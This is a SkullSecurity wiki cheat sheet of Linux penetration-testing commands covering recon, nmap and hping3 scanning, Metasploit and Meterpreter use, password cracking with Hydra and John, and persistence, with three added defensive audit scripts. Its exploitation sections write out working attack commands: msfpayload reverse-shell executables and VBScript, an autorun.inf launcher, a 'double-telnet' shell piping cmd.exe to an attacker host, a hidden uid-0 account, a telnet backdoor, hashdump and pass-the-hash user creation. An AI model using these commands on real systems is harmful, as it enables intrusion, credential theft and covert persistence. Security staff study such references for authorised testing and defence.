Linux Commands

From SkullSecurity
Revision as of 20:33, 25 June 2009 by Blackfrog (talk | contribs) (→‎Recon: Added snmpwalk ARP table dump command)

Recon

whois

$ whois [-h whois_server] name

nslookup

$ nslookup <target>

dig

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
$ dig [@server] <name> [type]
  • Zone transfer
$ dig [@server] <domain> -t AXFR
  • Iterative zone transfer
$ dig [@server] <domain> -t IXFR=<N>

BiLE.pl

$ ./BiLE <target> <result_file>
$ ./BiLE-weigh.pl <site_of_interest> <BiLE_output.mine>
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl

snmpwalk

Dump the ARP table of an SNMP server at <server> (SNMPv2c, read-only community string required)

$ snmpwalk -v 2c -c <community> <server> ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump

Scanning

tcpdump

Parameters

  • -n -- numeric output (don't resolve host names or port names)
  • -i <interface>
  • -v -- be verbose
  • -r <file>/-w <file> -- read from/write to file
  • -x -- print hex
  • -A -- print ASCII
  • -X -- print hex and ASCII
  • -s <snaplen> -- length to capture (-s0 for all data)

Filter string

  • Protocol
    • ether, ip, ip6, arp, rarp, tcp, udp
  • Type
    • host <host>
    • net <network>
    • port <portnum>
    • portrange <start-end>
  • Direction
    • src
    • dst
  • Logic
    • and
    • or
  • Show TCP against target 10.10.10.10 in ASCII
tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
  • Show all UDP from 10.10.10.10
tcpdump [-i tap0] -n udp and src 10.10.10.10
  • Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10

hping3

TCP Flags

  • --syn, --fin, --rst, --push, --ack, --urg

Target selection

  • --rand-dest
  • --interface <int>

Source selection

  • --spoof <hostname>
  • --rand-source

Port selection

  • --destport <port>
  • --destport +<port> -- increment by one for each packet received
  • --destport ++<port> -- increment by one for each packet sent
  • --scan <portrange>
  • --baseport <port>
  • --keep -- don't increment the source port

Speed options

  • --fast, --faster, --flood
  • --interval <N> -- interval in seconds
  • --interval u<N> -- interval in microseconds

Other options

  • --count <N>
  • --beep
  • --file <filename>
  • --data <N>

traceroute

Parameters

  • -f <N> -- Initial TTL
  • -g <hostlist> -- Loose source route
  • -I -- use ICMP Echo instead of UDP
  • -m <N> -- maximum number of hops (default 30)
  • -n -- numeric
  • -p <baseport> -- set the base UDP port
  • -w <N> -- wait N seconds (default 5)

Layer Four Traceroute (lft)

http://pwhois.org/lft/index.who

Options

  • -u -- use UDP
  • -p -- use ICMP echo
  • -d <port> -- destination port (default 80)
  • -s <port> -- source port
  • -L <N> -- length (including layer 3/4 header)
  • -A -- look up AS number
  • -P -- traceroute via tcp

nmap

Pinging

  • -PN -- don't ping
  • -PB -- default, ICMP Echo + TCP to port 80
  • -PE -- ICMP Echo request
  • -PS[portlist] -- TCP SYN
  • -PP -- ICMP Timestamp request
  • -PM -- ICMP Address Mask request
  • -PR -- default on subnet, use ARP to identify hosts

Scanning

  • -sT -- TCP Connect scan
  • -sS -- SYN scan
  • -sA -- ACK scan
  • -sF -- FIN scan
  • -sN -- Null scan
  • -sX -- Xmas Tree scan
  • -sM -- Maimon scan
  • --scanflags specify your own flags
  • -sU -- UDP scan
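The scan types above are also what a defender looks for in a capture. The following is an added example, not part of the original page: an awk filter over tcpdump's default text output that counts how many distinct destination ports each source hits with bare SYNs (the footprint a -sS scan leaves) and reports sources above a threshold. The capture lines are constructed for this demo; the function names are mine.

```shell
#!/bin/sh
# Added example (not from the SkullSecurity page): spot SYN-scan behaviour
# in tcpdump text output.  Bare SYNs can be isolated at capture time with
#   tcpdump -n -i eth0 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn'
# The lines below are constructed, not a real capture.

sample_capture() {
    cat <<'EOF'
12:00:00.000001 IP 10.10.10.5.40001 > 10.10.10.10.22: Flags [S], seq 1, win 1024, length 0
12:00:00.000002 IP 10.10.10.5.40002 > 10.10.10.10.23: Flags [S], seq 2, win 1024, length 0
12:00:00.000003 IP 10.10.10.5.40003 > 10.10.10.10.25: Flags [S], seq 3, win 1024, length 0
12:00:00.000004 IP 10.10.10.5.40004 > 10.10.10.10.80: Flags [S], seq 4, win 1024, length 0
12:00:00.000005 IP 10.10.10.5.40005 > 10.10.10.10.443: Flags [S], seq 5, win 1024, length 0
12:00:00.000006 IP 10.10.10.5.40006 > 10.10.10.10.8080: Flags [S], seq 6, win 1024, length 0
12:00:00.000007 IP 10.10.10.7.51000 > 10.10.10.10.80: Flags [S], seq 7, win 65535, length 0
12:00:00.000008 IP 10.10.10.7.51000 > 10.10.10.10.80: Flags [.], ack 8, win 65535, length 0
12:00:00.000009 IP 10.10.10.7.51001 > 10.10.10.10.443: Flags [S], seq 9, win 65535, length 0
EOF
}

# syn_scan_sources THRESHOLD < capture.txt
# Prints "src dst n" for every (src, dst) pair whose bare SYNs touched more
# than THRESHOLD distinct destination ports.  Field layout of a tcpdump line:
#   $1 time  $2 "IP"  $3 src.port  $4 ">"  $5 dst.port:  $6 "Flags"  $7 "[S],"
syn_scan_sources() {
    awk -v thr="$1" '
        $2 == "IP" && $7 == "[S]," {
            src = $3; sub(/\.[0-9]+$/, "", src)      # drop the source port
            dst = $5; sub(/:$/, "", dst)             # "10.10.10.10.80:" -> "10.10.10.10.80"
            port = dst; sub(/.*\./, "", port)        # last dotted field is the port
            sub(/\.[0-9]+$/, "", dst)                # drop the destination port
            key = src " " dst
            if (!((key, port) in seen)) { seen[key, port] = 1; ports[key]++ }
        }
        END { for (k in ports) if (ports[k] > thr) print k, ports[k] }
    '
}

# Stand-alone run: only 10.10.10.5 exceeds four distinct ports.
sample_capture | syn_scan_sources 4
```

A normal client (10.10.10.7 above) completes its handshakes and touches a couple of ports; a SYN scan leaves many half-open attempts across many ports from one source, which is what the per-pair distinct-port count exposes. Pick the threshold from your own baseline traffic.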

Fingerprinting

  • -O -- OS fingerprint
  • -sV -- Version scan

Scripts

  • -sC -- run all scripts
  • --script=<category,dir,script,etc>
  • --script-trace

Timing

  • --paranoid, --sneaky, --polite, --normal, --aggressive, --insane
  • --host-timeout, --max-rtt-timeout, --min-rtt-timeout, --initial-rtt-timeout, --max-parallelism, --scan-delay

Other options

  • -p<ports>
  • -F -- fast (checks only ports in nmap-services)
  • --packet-trace
  • --traceroute
  • --badsum

THC amap

Options

  • -q -- quiet (omit closed ports)
  • -v -- verbose
  • -b -- print banners

Example:

amap -bqv 10.10.10.10 1-50

Enumerating users

Commands

$ cat /etc/passwd
$ finger
$ who
$ w

Remotely:

$ finger @<target>

Exploitation

netcat

Options

  • -l -- listen mode
  • -L -- listen harder (Windows only)
  • -u -- UDP mode
  • -p -- local port (in listen mode, the port to listen on)
  • -e -- program to execute
  • -n -- don't resolve names
  • -z -- don't send any data
  • -w<N> -- timeout for connects
  • -v/-vv -- be verbose

Scanning

echo "" | nc -v -n -w1 <target> <port-range>

Setting up a relay

mknod backpipe p
nc -l -p <allowed_port> < backpipe | nc <host> <port> > backpipe

Relaying port 22 to the local system

mknod backpipe p
nc -l -p <allowed_port> < backpipe | nc localhost 22 > backpipe

Finding SetUID/SetGID programs

find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in $(locate -r "bin$"); do find "$i" -type f \( -perm -4000 -o -perm -2000 \) -print; done
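The same find expression is the basis of a defensive check: take a baseline of setuid/setgid files and later report anything that was not in it. The block below is an added example (not from the original page); it builds a throwaway directory with constructed files so it runs anywhere, and the function names are mine.

```shell
#!/bin/sh
# Added example (not from the SkullSecurity page): the page's find expression
# wrapped as a baseline comparison, so a newly planted setuid/setgid binary
# stands out.  Everything below happens in a temporary directory.

# list_suid DIR -- setuid/setgid regular files under DIR, sorted for comm
list_suid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print | sort
}

# new_suid BASELINE DIR -- files that are setuid/setgid now but absent from
# BASELINE (a file written earlier by list_suid)
new_suid() {
    list_suid "$2" | comm -13 "$1" -
}

# Constructed demo tree: two expected privileged files, one plain file.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/bin" "$demo_root/tmp"
: > "$demo_root/bin/legit"; chmod 4755 "$demo_root/bin/legit"   # setuid, expected
: > "$demo_root/bin/group"; chmod 2755 "$demo_root/bin/group"   # setgid, expected
: > "$demo_root/bin/plain"; chmod 0755 "$demo_root/bin/plain"   # no special bits

list_suid "$demo_root" > "$demo_root/baseline.txt"              # record the baseline

# Something planted after the baseline was taken.
: > "$demo_root/tmp/dropped"; chmod 4755 "$demo_root/tmp/dropped"

# Stand-alone run prints only the planted file.
new_suid "$demo_root/baseline.txt" "$demo_root"
```

On a real host, run list_suid / over a known-good image to produce the baseline, store it off-box, and schedule new_suid against it; any line it prints deserves a look.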

Metasploit

Running an exploit

msf> show exploits
msf> use exploit/windows/smb/ms05_039_pnp
msf> show payloads
msf> set PAYLOAD windows/shell/bind_tcp
msf> show options
msf> set RHOST 10.10.10.10
msf> exploit

Interacting with sessions

msf> sessions -l
msf> sessions -i <N>

Creating a malicious VBScript

$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> V
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y V

Creating a malicious Exe

$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> X
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y X

Example autorun.inf file to run a malicious exe (goes with Metasploit)

[autorun]
open=example.exe
icon=example.exe

Metasploit listener

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=<lhost> E
$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y E

Meterpreter

Filesystem commands

> cd
> lcd
> pwd / getwd
> ls
> cat
> download / upload
> mkdir / rmdir
> edit
> getpid
> getuid
> ps
> kill
> execute
> migrate
> ipconfig
> portfwd
> route
> idletime
> uictl <enable/disable> <keyboard/mouse>

Modules

> use <modulename>
> use priv
> hashdump
> timestomp

Creating a user

Adding an ordinary user

useradd <name>

Adding a root user (note: a non-uid-0 account may be required to log in)

useradd -o -u 0 <name>

telnet

Checking for inetd/xinetd

ps aux | grep inetd

Adding telnet to /etc/inetd.conf

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

Adding telnet to xinetd

  • Steal the file from a service that's running (files are in /etc/xinetd.d)
  • Change server to "/usr/sbin/in.telnetd"

Restarting inetd/xinetd (the "kill" command with the PID can also be used)

killall -HUP inetd
killall -HUP xinetd
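The two persistence tricks above (a second uid-0 account from "useradd -o -u 0", and telnet re-enabled through inetd) are easy to audit for. The block below is an added example, not part of the original page: two awk checks that take the file to inspect as an argument, run here against constructed copies of /etc/passwd and /etc/inetd.conf. The function names are mine.

```shell
#!/bin/sh
# Added example (not from the SkullSecurity page): audit for an extra uid-0
# account and for an active telnet line in inetd.conf.  Paths are arguments
# so the checks run against the constructed samples below; on a real host
# point them at /etc/passwd and /etc/inetd.conf.

# extra_uid0 PASSWD -- print every account with uid 0 that is not named root
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# inetd_telnet INETD_CONF -- print uncommented telnet service lines
inetd_telnet() {
    awk '$1 == "telnet" { print }' "$1"
}

# Constructed sample passwd: "sysadm" is the planted duplicate-uid-0 account.
sample_passwd=$(mktemp)
cat > "$sample_passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
george:x:1000:1000:George:/home/george:/bin/bash
sysadm:x:0:0::/tmp:/bin/bash
EOF

# Constructed sample inetd.conf: the first telnet line is commented out and
# should be ignored, the last one is live.
sample_inetd=$(mktemp)
cat > "$sample_inetd" <<'EOF'
#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
ftp    stream tcp nowait root /usr/sbin/tcpd in.ftpd
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
EOF

# Stand-alone run: prints "sysadm" and the live telnet line.
extra_uid0 "$sample_passwd"
inetd_telnet "$sample_inetd"
```

Both checks are cheap enough to run from cron and diff against the previous result; for xinetd, apply the same idea to the "server" lines under /etc/xinetd.d.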

sshd

File should be in /etc/rc*. Ways to enable:

chkconfig sshd on
service sshd start
/etc/init.d/sshd start

Passwords

Dictionaries

Creating a dictionary

sort -u wordlist.txt > dictionary.txt

Scraping a Web site

mkdir /tmp/source
cd /tmp/source
wget -r -l <N> <target>
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort -u > wordlist.lst

Or, just use my dictionaries

Account lockout

grep tally /etc/pam.d/*
grep tally /etc/pam.conf

pw-inspector

Options

  • -i -- input file
  • -o -- output file
  • -m <N> -- minimum length
  • -M <N> -- maximum length
  • -c <N> -- the number of criteria
    • -l -- lower case
    • -u -- upper case
    • -n -- numbers
    • -p -- printable characters (lower/upper/num)
    • -s -- special characters (all others)

Example

cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2

Hydra

Options

  • -l <username>/-L <userfile> -- Login name/file
  • -p <password>/-P <passfile> -- Password/file
  • -e <n|s|ns> -- extended checks (n = null, s = same as username)
  • -t <N> -- thread count
hydra <host> <protocol> <-l <username>|-L <userfile>> <-p <password>|-P <passfile>> [-e <n|s|ns>] [-t <threads>]

smb password

hydra <host> smb -l george -P ./list.lst -e ns

ssh password

hydra <host> ssh2 -l george -P ./list.lst -e ns

John

Show cracked passwords

john --show <passwordfile>

Speed test

john --test

Running against a password file

john <passwordfile>

Specifying hash type

john --format=<format> <passwordfile>
john --format=nt /tmp/pwdump

Combining passwd/shadow

unshadow <passwdfile> <shadowfile> > combined.txt
john combined.txt

Modified Samba

Loading the hash

export SMBHASH="<LANMAN>:<NT>"
echo $SMBHASH

Mounting a drive

./smbmount //<target>/<share> <mountpoint> -o username=<username>
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator

Adding a user

./net user ADD <username> <password> -I <target> -U <admin_username>
./net rpc group ADDMEM administrators <username> -I <target> -U <admin_username>

Web

nikto.pl

Scanning

nikto.pl -h <host>

Updating

nikto.pl -update

Single check

nikto.pl -Single

Fancy tricks

Double-telnet

On the attacker machine

nc -l -p 4444
nc -l -p 5555

On the victim machine

telnet <attacker> 4444 | cmd.exe | telnet <attacker> 5555